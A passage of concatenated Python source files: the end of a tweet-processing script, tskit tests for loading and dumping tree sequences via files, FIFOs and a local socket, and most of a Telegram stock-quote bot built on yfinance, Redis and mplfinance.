final+=[(candidateString[matches[i]:matches[i+1]]).strip()]
final+=[candidateString[matches[-1]:]]
final=list(filter(lambda strin: strin!="",final))
final=list(map(lambda strin: strin.strip(),final))
print(final)'''
# tweets=pd.read_csv("deduplicated_test.csv", header=0, index_col = 0 ,encoding = 'utf-8',delimiter=';')
# tweets=tweets[:1000:]
# Phase1= SatadishaModule()
# for i in range(2):
# Phase1= SatadishaModule()
# Phase1.extract(tweets,1)
|
test_fileobj.py
|
# MIT License
#
# Copyright (c) 2018-2020 Tskit Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Test cases for loading and dumping different types of files and streams
"""
import io
import multiprocessing
import os
import pathlib
import platform
import queue
import shutil
import socket
import socketserver
import tempfile
import traceback
import pytest
from pytest import fixture
import tskit
IS_WINDOWS = platform.system() == "Windows"
IS_OSX = platform.system() == "Darwin"
class TestPath:
@fixture
def tempfile_name(self):
with tempfile.TemporaryDirectory() as tmp_dir:
yield f"{tmp_dir}/plain_path"
def test_pathlib(self, ts_fixture, tempfile_name):
ts_fixture.dump(tempfile_name)
ts2 = tskit.load(tempfile_name)
assert ts_fixture.tables == ts2.tables
class TestPathLib:
@fixture
def pathlib_tempfile(self):
fd, path = tempfile.mkstemp(prefix="tskit_test_pathlib")
os.close(fd)
temp_file = pathlib.Path(path)
yield temp_file
temp_file.unlink()
def test_pathlib(self, ts_fixture, pathlib_tempfile):
ts_fixture.dump(pathlib_tempfile)
ts2 = tskit.load(pathlib_tempfile)
assert ts_fixture.tables == ts2.tables
class TestFileObj:
@fixture
def fileobj(self):
with tempfile.TemporaryDirectory() as tmp_dir:
with open(f"{tmp_dir}/fileobj", "wb") as f:
yield f
def test_fileobj(self, ts_fixture, fileobj):
ts_fixture.dump(fileobj)
fileobj.close()
ts2 = tskit.load(fileobj.name)
assert ts_fixture.tables == ts2.tables
def test_fileobj_multi(self, replicate_ts_fixture, fileobj):
file_offsets = []
for ts in replicate_ts_fixture:
ts.dump(fileobj)
file_offsets.append(fileobj.tell())
fileobj.close()
with open(fileobj.name, "rb") as f:
for ts, file_offset in zip(replicate_ts_fixture, file_offsets):
ts2 = tskit.load(f)
file_offset2 = f.tell()
assert ts.tables == ts2.tables
assert file_offset == file_offset2
class TestFileObjRW:
@fixture
def fileobj(self):
with tempfile.TemporaryDirectory() as tmp_dir:
pathlib.Path(f"{tmp_dir}/fileobj").touch()
with open(f"{tmp_dir}/fileobj", "r+b") as f:
yield f
def test_fileobj(self, ts_fixture, fileobj):
ts_fixture.dump(fileobj)
fileobj.seek(0)
ts2 = tskit.load(fileobj)
assert ts_fixture.tables == ts2.tables
def test_fileobj_multi(self, replicate_ts_fixture, fileobj):
file_offsets = []
for ts in replicate_ts_fixture:
ts.dump(fileobj)
file_offsets.append(fileobj.tell())
fileobj.seek(0)
for ts, file_offset in zip(replicate_ts_fixture, file_offsets):
ts2 = tskit.load(fileobj)
file_offset2 = fileobj.tell()
assert ts.tables == ts2.tables
assert file_offset == file_offset2
class TestFD:
@fixture
def fd(self):
with tempfile.TemporaryDirectory() as tmp_dir:
pathlib.Path(f"{tmp_dir}/fd").touch()
with open(f"{tmp_dir}/fd", "r+b") as f:
yield f.fileno()
def test_fd(self, ts_fixture, fd):
ts_fixture.dump(fd)
os.lseek(fd, 0, os.SEEK_SET)
ts2 = tskit.load(fd)
assert ts_fixture.tables == ts2.tables
def test_fd_multi(self, replicate_ts_fixture, fd):
for ts in replicate_ts_fixture:
ts.dump(fd)
os.lseek(fd, 0, os.SEEK_SET)
for ts in replicate_ts_fixture:
ts2 = tskit.load(fd)
assert ts.tables == ts2.tables
class TestUnsupportedObjects:
def test_string_io(self, ts_fixture):
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
ts_fixture.dump(io.StringIO())
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
tskit.load(io.StringIO())
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
ts_fixture.dump(io.BytesIO())
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
tskit.load(io.BytesIO())
def dump_to_stream(q_err, q_in, file_out):
"""
Get tree sequences from `q_in` and ts.dump() them to `file_out`.
Uncaught exceptions are placed onto the `q_err` queue.
"""
try:
with open(file_out, "wb") as f:
while True:
ts = q_in.get()
if ts is None:
break
ts.dump(f)
except Exception as exc:
tb = traceback.format_exc()
q_err.put((exc, tb))
def load_from_stream(q_err, q_out, file_in):
"""
tskit.load() tree sequences from `file_in` and put them onto `q_out`.
Uncaught exceptions are placed onto the `q_err` queue.
"""
try:
with open(file_in, "rb") as f:
while True:
try:
ts = tskit.load(f)
except EOFError:
break
q_out.put(ts)
except Exception as exc:
tb = traceback.format_exc()
q_err.put((exc, tb))
def stream(fifo, ts_list):
"""
data -> q_in -> ts.dump(fifo) -> tskit.load(fifo) -> q_out -> data_out
"""
q_err = multiprocessing.Queue()
q_in = multiprocessing.Queue()
q_out = multiprocessing.Queue()
proc1 = multiprocessing.Process(target=dump_to_stream, args=(q_err, q_in, fifo))
proc2 = multiprocessing.Process(target=load_from_stream, args=(q_err, q_out, fifo))
proc1.start()
proc2.start()
for data in ts_list:
q_in.put(data)
q_in.put(None) # signal the process that we're done
proc1.join(timeout=3)
if not q_err.empty():
# re-raise the first child exception
exc, tb = q_err.get()
print(tb)
raise exc
if proc1.is_alive():
# prevent hang if proc1 failed to join
proc1.terminate()
proc2.terminate()
raise RuntimeError("proc1 (ts.dump) failed to join")
ts_list_out = []
for _ in ts_list:
try:
data_out = q_out.get(timeout=3)
except queue.Empty:
# terminate proc2 so we don't hang
proc2.terminate()
raise
ts_list_out.append(data_out)
proc2.join(timeout=3)
if proc2.is_alive():
# prevent hang if proc2 failed to join
proc2.terminate()
raise RuntimeError("proc2 (tskit.load) failed to join")
assert len(ts_list) == len(ts_list_out)
for ts, ts_out in zip(ts_list, ts_list_out):
assert ts.tables == ts_out.tables
@pytest.mark.skipif(IS_WINDOWS, reason="No FIFOs on Windows")
class TestFIFO:
@fixture
def fifo(self):
temp_dir = tempfile.mkdtemp(prefix="tsk_test_streaming")
temp_fifo = os.path.join(temp_dir, "fifo")
os.mkfifo(temp_fifo)
yield temp_fifo
shutil.rmtree(temp_dir)
def test_single_stream(self, fifo, ts_fixture):
stream(fifo, [ts_fixture])
def test_multi_stream(self, fifo, replicate_ts_fixture):
stream(fifo, replicate_ts_fixture)
ADDRESS = ("localhost", 10009)
class Server(socketserver.ThreadingTCPServer):
allow_reuse_address = True
class StoreEchoHandler(socketserver.BaseRequestHandler):
def handle(self):
while True:
try:
ts = tskit.load(self.request.fileno())
except EOFError:
break
ts.dump(self.request.fileno())
self.server.shutdown()
def server_process(q):
server = Server(ADDRESS, StoreEchoHandler)
# Tell the client (on the other end of the queue) that it's OK to open
# a connection
q.put(None)
server.serve_forever()
@pytest.mark.skipif(IS_WINDOWS or IS_OSX, reason="Errors on systems without proper fds")
class TestSocket:
@fixture
def client_fd(self):
# Use a queue to synchronise the startup of the server and the client.
q = multiprocessing.Queue()
_server_process = multiprocessing.Process(target=server_process, args=(q,))
_server_process.start()
q.get(timeout=3)
client = socket.create_connection(ADDRESS)
yield client.fileno()
client.close()
_server_process.join(timeout=3)
def verify_stream(self, ts_list, client_fd):
for ts in ts_list:
ts.dump(client_fd)
echo_ts = tskit.load(client_fd)
assert ts.tables == echo_ts.tables
def test_single_then_multi(self, ts_fixture, replicate_ts_fixture, client_fd):
self.verify_stream([ts_fixture], client_fd)
self.verify_stream(replicate_ts_fixture, client_fd)
|
tickergram.py
|
#!/usr/bin/env python3
import time, sys, os, uuid, tempfile, re, subprocess, json, logging, datetime, multiprocessing, threading, argparse, shutil
import requests
import yfinance as yf
import mplfinance as mpf
import redis
import requests
import pandas as pd
#import talib
import locale
locale.setlocale(locale.LC_ALL, "en_US.utf8")
class tickergram:
def __init__(self, tg_token, redis_host, redis_port, redis_db, password="", allow_commands=[]):
# Configuration
self.BOT_PASSWORD = password
self.BOT_ENABLED_PASS = True if password else False
self.REDIS_HOST = redis_host
self.REDIS_PORT = redis_port
self.REDIS_DB = redis_db
self.ALLOW_COMMANDS = allow_commands
self.TG_API="https://api.telegram.org/bot" + tg_token
self.MAX_CHART_RANGE = datetime.timedelta(days=3*365) # 3 years
self.POLLING_TIMEOUT = 600
# Configure logging
self.logger = logging.getLogger("tickergram_log")
self.logger.setLevel(logging.DEBUG)
logger_fh = logging.FileHandler("tickergram.log")
logger_fh.setLevel(logging.DEBUG)
logger_ch = logging.StreamHandler()
logger_ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(message)s")
logger_fh.setFormatter(formatter)
logger_ch.setFormatter(formatter)
self.logger.addHandler(logger_fh)
self.logger.addHandler(logger_ch)
# Anti flood protection
self.antiflood_cache = {}
self.ANTI_FLOOD_SECS = 1
def tg_getme(self):
r = requests.get(self.TG_API+"/getMe")
d = r.json()
if not d["ok"]:
return False
return d
def tg_send_msg(self, text, chat_id):
d = {"chat_id": chat_id, "text": text, "parse_mode": "MarkdownV2", "disable_web_page_preview": True}
r = requests.get(self.TG_API+"/sendMessage", params=d)
d = r.json()
if not d["ok"]:
return False
return d
def tg_send_msg_post(self, text, chat_id):
d = {"chat_id": chat_id, "text": text, "parse_mode": "MarkdownV2", "disable_web_page_preview": True}
r = requests.post(self.TG_API+"/sendMessage", params=d)
d = r.json()
if not d["ok"]:
return False
return d
def tg_chat_exists(self, chat_id):
d = {"chat_id": chat_id}
r = requests.get(self.TG_API+"/getChat", params=d)
d = r.json()
if d["ok"]:
return True
elif not d["ok"] and d["error_code"] == 400:
return False
else:
raise RuntimeError("tg_chat_exists not ok")
return d
def tg_delete_msg(self, tg_message):
d = {"chat_id": tg_message["chat"]["id"], "message_id": tg_message["message_id"]}
r = requests.get(self.TG_API+"/deleteMessage", params=d)
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_delete_msg not ok")
return d
def tg_send_pic(self, f, chat_id):
d = {"chat_id": chat_id}
r = requests.post(self.TG_API+"/sendPhoto", data=d, files={"photo": open(f, "rb")})
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_send_pic not ok")
return d
def tg_get_messages(self, offset=0, limit=1):
d = {"timeout": self.POLLING_TIMEOUT, "allowed_updates": ["message"], "limit": limit}
if offset:
d["offset"] = offset
r = requests.get(self.TG_API+"/getUpdates", params=d, timeout=self.POLLING_TIMEOUT+30)
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_get_messages not ok")
return d
def tg_send_action(self, chat_id, action="typing"):
d = {"chat_id": chat_id, "action": action}
r = requests.post(self.TG_API+"/sendChatAction", data=d)
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_send_action not ok")
return d
def tg_start_action(self, chat_id, action="typing"):
# Wrapper for tg_send_action that sends the action
# in intervals on different threads using threading.Timer
self.tg_send_action(chat_id, action=action)
# Recursive call to setup the Timer every 5 seconds
t = threading.Timer(5.0, self.tg_start_action, kwargs={"chat_id": chat_id, "action": action})
t.daemon = True
t.start()
def redis_get_db(self):
return redis.Redis(host=self.REDIS_HOST,
port=self.REDIS_PORT, db=self.REDIS_DB)
def redis_ping(self):
try:
return self.redis_get_db().ping()
except:
return False
def redis_add_chat_auth(self, chat_id):
r = self.redis_get_db()
r.sadd("auth_chats", chat_id)
def redis_check_chat_auth(self, chat_id):
return self.redis_get_db().sismember("auth_chats", chat_id)
def redis_user_watch_info_exists(self, chat_id):
r = self.redis_get_db()
return r.exists("wl_{}_info".format(chat_id))
def redis_user_watch_info_save(self, chat_id, info):
r = self.redis_get_db()
r.set("wl_{}_info".format(chat_id), json.dumps(info))
def redis_add_user_watch(self, ticker, chat_id):
r = self.redis_get_db()
r.sadd("wl_{}".format(chat_id), ticker)
def redis_del_user_watch(self, ticker, chat_id):
r = self.redis_get_db()
r.srem("wl_{}".format(chat_id), ticker)
def redis_list_user_watch(self, chat_id):
r = self.redis_get_db()
return sorted(r.smembers("wl_{}".format(chat_id)))
def redis_watch_toggle(self, chat_id):
r = self.redis_get_db()
if r.sismember("wl_enabled", chat_id):
r.srem("wl_enabled", chat_id)
return False
else:
r.sadd("wl_enabled", chat_id)
return True
def redis_watch_disable(self, chat_id):
r = self.redis_get_db()
r.srem("wl_enabled", chat_id)
def redis_list_enabled_watchlists(self):
r = self.redis_get_db()
return r.smembers("wl_enabled")
def redis_get_feargreed_cache(self):
return self.redis_get_db().get("feargreed_cache")
def redis_set_feargreed_cache(self, img_data):
r = self.redis_get_db()
r.setex("feargreed_cache", 10800, img_data) # 3 hour exp
def redis_get_quote_cache(self, ticker):
d = self.redis_get_db().get("quote_"+ticker)
return json.loads(d) if d else None
def redis_set_quote_cache(self, ticker, ticker_data):
r = self.redis_get_db()
r.setex("quote_"+ticker, 300, json.dumps(ticker_data)) # 5 min exp
def test_tg_or_die(self):
self.logger.info("Checking Telegram API token ...")
if not self.tg_getme():
self.logger.error("Telegram API token is invalid, exiting ...")
sys.exit(1)
self.logger.info("Telegram API token is valid")
def test_redis_or_die(self):
self.logger.info("Testing Redis connectivity ...")
if not self.redis_ping():
self.logger.error("Unable to connect to Redis, exiting ...")
sys.exit(1)
self.logger.info("Redis connection is ok")
def write_pidfile(self):
pidf = os.path.join(tempfile.gettempdir(), "tickergram.pid")
pid = os.getpid()
with open(pidf, "w") as f:
f.write(str(pid))
return pid
def ticker_add_emoji(self, ticker):
emoji_dict = {"SPY": u"\U0001F1FA\U0001F1F8", "QQQ": u"\U0001F4BB", "MCHI": u"\U0001F1E8\U0001F1F3",
"FEZ": u"\U0001F1EA\U0001F1FA", "BTC-USD": u"\U000020BF ", "GC=F": u"\U0001F947",
"VNQ": u"\U0001F3E0", "^TNX": u"\U0001F4B5", "^VIX": u"\U0001F3A2"}
return emoji_dict.get(ticker, "") + ticker
def ticker_chg_emoji_color(self, sign):
return u"\U0001F7E2" if sign == "+" else u"\U0001F534"
def text_quote_long(self, t, short_name, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg, ftweek_low, ftweek_low_chg,
day_low, day_high, volume, volume_avg, pe, pe_forward, div_yield):
price_chg_sign = "+" if price >= price_prevclose else "-"
ftweek_high_chg_sign = "+" if price >= ftweek_high else "-"
ftweek_low_chg_sign = "+" if price >= ftweek_low else "-"
if price_change > 1:
price_change_emoji = u"\U0001F4C9" if price_chg_sign == "-" else u"\U0001F680"
else:
price_change_emoji = ""
ftweek_high_chg_emoji = ""+(u"\U00002757"*int(ftweek_high_chg/10))
text_msg = "```\n"
text_msg += "{}\n".format(short_name)
text_msg += "{}{} {:.2f} ({}{:.2f}%{})\n".format(self.ticker_chg_emoji_color(price_chg_sign), t, price, price_chg_sign, price_change, price_change_emoji)
text_msg += "-"*len(t) + "\n"
text_msg += "Day's range {:.2f} - {:.2f}\n".format(day_low, day_high)
text_msg += "52w high {:.2f} ({}{:.2f}%{})\n".format(ftweek_high, ftweek_high_chg_sign, ftweek_high_chg, ftweek_high_chg_emoji)
text_msg += "52w low {:.2f} ({}{:.2f}%)\n".format(ftweek_low, ftweek_low_chg_sign, ftweek_low_chg)
text_msg += "Volume {}\n".format(volume)
text_msg += "Volume average {}\n".format(volume_avg)
text_msg += "PE ratio {}\n".format(pe)
text_msg += "PE ratio forward {}\n".format(pe_forward)
text_msg += "Dividend yield {}\n".format(div_yield)
text_msg += "\n```"
return text_msg
def text_quote_short(self, t, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg):
price_change_sign = "+" if price >= price_prevclose else "-"
if price_change > 1:
price_change_emoji = u"\U0001F4C9" if price_change_sign == "-" else u"\U0001F680"
else:
price_change_emoji = ""
ftweek_high_chg_sign = "+" if price >= ftweek_high else "-"
ftweek_high_chg_emoji = ""+(u"\U00002757"*int(ftweek_high_chg/10))
text_msg = "{}{} {:.2f} ({}{:.2f}%{} 52w high chg {}{:.2f}%{})\n".format(self.ticker_chg_emoji_color(price_change_sign), self.ticker_add_emoji(t),
price, price_change_sign, price_change, price_change_emoji, ftweek_high_chg_sign, ftweek_high_chg, ftweek_high_chg_emoji)
return text_msg
def generic_get_quote(self, ticker):
# Easily replace the quote provider here, using the same standard
# output format used in yf_get_quote
return self.yf_get_quote(ticker)
def generic_get_news(self, ticker):
# Easily replace the data provider here, using the same standard
# output format used in yf_get_news
return self.yf_get_news(ticker)
def yf_get_quote(self, ticker):
# Get ticker cache before querying YF
quote_cache = self.redis_get_quote_cache(ticker)
if quote_cache:
return quote_cache
ret_data = {}
try:
ty = yf.Ticker(ticker)
ty_info = ty.info
except:
return None
if "shortName" not in ty_info.keys() or not ty_info.get("regularMarketPrice"):
return None
ret_data["company_name"] = ty_info["shortName"]
ret_data["latest_price"] = round(ty_info["regularMarketPrice"], 2)
ret_data["previous_close"] = round(ty_info["previousClose"], 2)
ret_data["52w_high"] = round(ty_info["fiftyTwoWeekHigh"], 2)
ret_data["52w_low"] = round(ty_info["fiftyTwoWeekLow"], 2)
ret_data["day_high"] = round(ty_info["dayHigh"], 2)
ret_data["day_low"] = round(ty_info["dayLow"], 2)
ret_data["market_volume"] = ty_info["regularMarketVolume"]
ret_data["market_volume"] = f'{ret_data["market_volume"]:n}'
ret_data["market_volume_avg"] = ty_info["averageVolume"]
ret_data["market_volume_avg"] = f'{ret_data["market_volume_avg"]:n}'
pe = ty_info.get("trailingPE", None)
pe = "{:.2f}".format(round(pe, 2)) if pe else "N/A"
ret_data["pe_trailing"] = pe
pe_forward = ty_info.get("forwardPE", None)
pe_forward = "{:.2f}".format(round(pe_forward, 2)) if pe_forward else "N/A"
ret_data["pe_forward"] = pe_forward
div_yield = ty_info.get("dividendYield", None)
div_yield = "{:.2f}%".format(round(div_yield*100, 2)) if div_yield else "N/A"
ret_data["div_yield"] = div_yield
self.redis_set_quote_cache(ticker, ret_data)
return ret_data
def yf_get_stock_chart(self, ticker, time_range="1Y", interval="1D"):
# Make YF range and interval formats compatible
time_range = time_range.replace("M", "MO")
interval = interval.replace("W", "WK")
interval = interval.replace("M", "MO")
output_file = "{}.png".format(str(uuid.uuid4()))
try:
t = yf.Ticker(ticker)
hist = t.history(period=time_range, interval=interval)
mpf.plot(hist, type="candle", volume=True, style="mike", datetime_format='%b %Y',
figratio=(20,10), tight_layout=True,
title="\n{} {}".format(ticker, time_range),
savefig=dict(fname=output_file, dpi=95))
except:
pass
return output_file
def yf_get_news(self, ticker):
try:
ty = yf.Ticker(ticker)
ty_news = ty.news
except:
return None
ret_data = []
if ty_news:
for n in ty_news:
ret_data.append({"title": n["title"], "link": n["link"], "time":
datetime.datetime.fromtimestamp(n["providerPublishTime"])})
return ret_data
def cnn_get_fear_greed(self):
output_file = "{}.png".format(str(uuid.uuid4()))
cache_pic = self.redis_get_feargreed_cache()
if cache_pic:
with open(output_file, "wb") as f:
f.write(cache_pic)
else:
self.ff_screenshot("https://money.cnn.com/data/fear-and-greed/", "660,470", output_file)
if os.path.exists(output_file):
with open(output_file, "rb") as f:
self.redis_set_feargreed_cache(f.read())
return output_file
def ff_screenshot(self, url, ws, output):
profile = str(uuid.uuid4())
profile_path = os.path.join(tempfile.gettempdir(), profile)
os.mkdir(profile_path)
try:
subprocess.run(["firefox", "--headless", "--kiosk", "--profile", profile_path,
"--window-size={}".format(ws), "--screenshot", output, url], timeout=300)
shutil.rmtree(profile_path)
except:
pass
def get_change(self, current, previous):
if current == previous:
return 0
try:
return round((abs(current - previous) / previous) * 100.0, 2)
except ZeroDivisionError:
return float("inf")
def adjust_chart_interval(self, dt_time_range):
if dt_time_range <= datetime.timedelta(days=1):
return "1H"
elif dt_time_range <= datetime.timedelta(days=30):
return "1D"
elif dt_time_range <= datetime.timedelta(days=365):
return "1W"
else:
return "1M"
def valid_ticker(self, ticker):
return True if len(ticker) <= 8 and re.fullmatch(r"^[A-Za-z0-9\.\^\-]{1,8}$", ticker) else False
def bot_watchlist_notify(self, chat_id=None):
if chat_id:
# Craft a fake watchlist list for this chat
watchlists = [str(chat_id)]
else:
# This function was called from notify_watchers()
self.test_tg_or_die()
self.test_redis_or_die()
watchlists = self.redis_list_enabled_watchlists()
for chat_id in watchlists:
chat_id = chat_id.decode() if type(chat_id) is not str else chat_id
if not self.tg_chat_exists(int(chat_id)):
# Chat doesn't exist anymore, disable automatic notifications for this watchlist
self.redis_watch_disable(chat_id)
continue
wl_tickers = self.redis_list_user_watch(chat_id)
if not wl_tickers:
continue
text_msg = "```\n"
for t in wl_tickers:
t = t.decode()
ticker_info = self.generic_get_quote(t)
if not ticker_info:
continue
price = ticker_info["latest_price"]
price_prevclose = ticker_info["previous_close"]
ftweek_high = ticker_info["52w_high"]
# Get price changes
price_change = self.get_change(price, price_prevclose)
ftweek_high_chg = self.get_change(price, ftweek_high)
# Compose message text
text_msg += self.text_quote_short(t, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg)
text_msg += "```"
if not self.tg_send_msg_post(text_msg, chat_id):
# Error delivering message, disable automatic notifications for this watchlist
self.redis_watch_disable(chat_id)
def bot_auth_chat(self, chat):
return self.redis_check_chat_auth(chat["id"])
def bot_antiflood_check(self, msg_from, msg_time):
for u in list(self.antiflood_cache.keys()):
if self.antiflood_cache[u] + self.ANTI_FLOOD_SECS < msg_time:
del self.antiflood_cache[u]
hit_antiflood = msg_from["id"] in self.antiflood_cache.keys()
self.antiflood_cache[msg_from["id"]] = msg_time
return hit_antiflood
def bot_cmd_help(self, chat, text, msg_from):
text_msg = "/help show this help message\n"
if self.BOT_ENABLED_PASS:
text_msg += "/auth *\<password\>* authorize chat to use this bot if password is correct\n"
text_msg += "/quote *\<ticker\>* get quote\n"
text_msg += "/chart *\<ticker\> \[1y,6m,5d\]* get price and volume chart\n"
text_msg += "/news *\<ticker\>* get the latest news related to the ticker\n"
text_msg += "/watch *list\|add\|del* *\[ticker\]* list, add or remove ticker from your watchlist\n"
text_msg += "/watchlist get an overview of your watchlist\n"
text_msg += "/watchlistnotify toggle the automatic watchlist notifications on and off\n"
text_msg += "/overview get an overview of global markets\n"
text_msg += "/feargreed get picture of CNN's Fear & Greed Index\n"
text_msg += "/screener print screener results\n"
#text_msg += u"_Powered by [Tickergram](https://github.com/a0rtega/tickergram-bot)_"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_auth(self, chat, text, msg_from):
auth_pwd = text.replace("/auth ", "")
if auth_pwd == self.BOT_PASSWORD:
self.redis_add_chat_auth(chat["id"])
text_msg = "```\nChat access granted, welcome {}\n```".format(msg_from["first_name"])
else:
text_msg = "```\nInvalid password\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_quote(self, chat, text, msg_from):
ticker = text.replace("/quote ", "").upper()
if self.valid_ticker(ticker):
self.tg_start_action(chat["id"])
ticker_info = self.generic_get_quote(ticker)
if ticker_info:
short_name = ticker_info["company_name"]
price = ticker_info["latest_price"]
price_prevclose = ticker_info["previous_close"]
ftweek_high = ticker_info["52w_high"]
ftweek_low = ticker_info["52w_low"]
day_high = ticker_info["day_high"]
day_low = ticker_info["day_low"]
volume = ticker_info["market_volume"]
volume_avg = ticker_info["market_volume_avg"]
pe = ticker_info["pe_trailing"]
pe_forward = ticker_info["pe_forward"]
div_yield = ticker_info["div_yield"]
# Get price changes
price_change = self.get_change(price, price_prevclose)
ftweek_high_chg = self.get_change(price, ftweek_high)
ftweek_low_chg = self.get_change(price, ftweek_low)
# Compose message text
text_msg = self.text_quote_long(ticker, short_name, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg, ftweek_low, ftweek_low_chg,
day_low, day_high, volume, volume_avg, pe, pe_forward, div_yield)
else:
text_msg = "```\nError getting ticker info\n```"
else:
text_msg = "```\nInvalid ticker\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_news(self, chat, text, msg_from):
ticker = text.replace("/news ", "").upper()
if self.valid_ticker(ticker):
self.tg_start_action(chat["id"])
ticker_news = self.generic_get_news(ticker)
if ticker_news:
text_msg = ""
for n in ticker_news:
text_msg += u"\U00002022 *{}*: `{}` \([link]({})\)\n".format(n["time"].strftime("%Y\-%m\-%d"),
n["title"], n["link"])
text_msg = text_msg[:-1] # remove last newline
else:
text_msg = "```\nError getting ticker news\n```"
else:
text_msg = "```\nInvalid ticker\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_watch(self, chat, text, msg_from):
cmd = text.replace("/watch ", "").split(" ")
if cmd[0] == "list":
watchlist = self.redis_list_user_watch(chat["id"])
watchlist = ", ".join([w.decode() for w in watchlist]) if watchlist else "empty"
text_msg = "```\nYour watchlist is {}\n```".format(watchlist)
elif cmd[0] == "add" and len(cmd) == 2:
ticker = cmd[1].upper()
if len(self.redis_list_user_watch(chat["id"])) <= 50:
if self.valid_ticker(ticker):
self.tg_start_action(chat["id"])
ticker_info = self.generic_get_quote(ticker)
if ticker_info:
if not self.redis_user_watch_info_exists(chat["id"]):
self.redis_user_watch_info_save(chat["id"], {"chat":chat, "msg_from":msg_from})
self.redis_add_user_watch(ticker, chat["id"])
text_msg = "```\n{} added to your watchlist\n```".format(ticker)
else:
text_msg = "```\nError getting ticker info\n```"
else:
text_msg = "```\nInvalid ticker\n```"
else:
text_msg = "```\nWatchlist maximum limit hit\n```"
elif cmd[0] == "del" and len(cmd) == 2:
ticker = cmd[1].upper()
if self.valid_ticker(ticker):
self.redis_del_user_watch(ticker, chat["id"])
text_msg = "```\n{} removed from your watchlist\n```".format(ticker)
else:
text_msg = "```\nInvalid ticker\n```"
else:
text_msg = "```\nInvalid watch command\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_watchlist(self, chat, text, msg_from):
self.tg_start_action(chat["id"])
if not self.redis_list_user_watch(chat["id"]):
text_msg = "```\nYour watchlist is empty\n```"
self.tg_send_msg_post(text_msg, chat["id"])
else:
self.bot_watchlist_notify(chat["id"])
def bot_cmd_watchlistnotify(self, chat, text, msg_from):
status = self.redis_watch_toggle(chat["id"])
status = "enabled" if status else "disabled"
text_msg = "```\nWatchlist notifications are now {}\n```".format(status)
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_chart(self, chat, text, msg_from):
request = text.replace("/chart ", "").split(" ")
ticker = request[0].upper()
if len(request) > 1:
time_range = request[1].upper()
else:
time_range = "1Y"
if not self.valid_ticker(ticker):
text_msg = "```\nInvalid ticker\n```"
self.tg_send_msg_post(text_msg, chat["id"])
return
if not re.fullmatch(r"^\d{1,3}(Y|M|D)$", time_range):
text_msg = "```\nInvalid time range\n```"
self.tg_send_msg_post(text_msg, chat["id"])
return
time_range_int = int(time_range[:-1])
if time_range.endswith("Y"):
chart_td = datetime.timedelta(days=time_range_int*365)
elif time_range.endswith("M"):
chart_td = datetime.timedelta(days=time_range_int*30)
else:
chart_td = datetime.timedelta(days=time_range_int)
if (self.MAX_CHART_RANGE - chart_td) < datetime.timedelta(0):
text_msg = "```\nChart time range exceeds the limit\n```"
self.tg_send_msg_post(text_msg, chat["id"])
return
interval = self.adjust_chart_interval(chart_td)
self.tg_start_action(chat["id"], "upload_photo")
output_pic = self.yf_get_stock_chart(ticker, time_range, interval)
if os.path.exists(output_pic):
self.tg_send_pic(output_pic, chat["id"])
os.remove(output_pic)
else:
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_overview(self, chat, text, msg_from):
global_tickers = ["#Stocks ETFs", "SPY", "QQQ",
"FEZ", "MCHI", "VNQ", "#VIX", "^VIX",
"#10Y Bonds", "^TNX",
"#Currency", "RUB=X",
"#Gold", "GC=F",
"#Crypto", "BTC-USD"]
self.tg_start_action(chat["id"])
try:
text_msg = "```\n"
for t in global_tickers:
if t.startswith("#"): # Parse sections
if len(t) > 1:
text_msg += "----- {}\n".format(t[1:])
else:
text_msg += "-----\n"
continue
ticker_info = self.generic_get_quote(t)
price = ticker_info["latest_price"]
price_prevclose = ticker_info["previous_close"]
ftweek_high = ticker_info["52w_high"]
# Get price changes
price_change = self.get_change(price, price_prevclose)
ftweek_high_chg = self.get_change(price, ftweek_high)
# Compose message text
text_msg += self.text_quote_short(t, price, price_prevclose, price_change, ftweek_high, ftweek_high_chg)
text_msg += "```"
except Exception as e:
self.logger.error(str(e))
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_feargreed(self, chat, text, msg_from):
self.tg_start_action(chat["id"], "upload_photo")
output_pic = self.cnn_get_fear_greed()
if os.path.exists(output_pic):
self.tg_send_pic(output_pic, chat["id"])
os.remove(output_pic)
else:
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_screener(self, chat, text, msg_from):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
def get_screener(version):
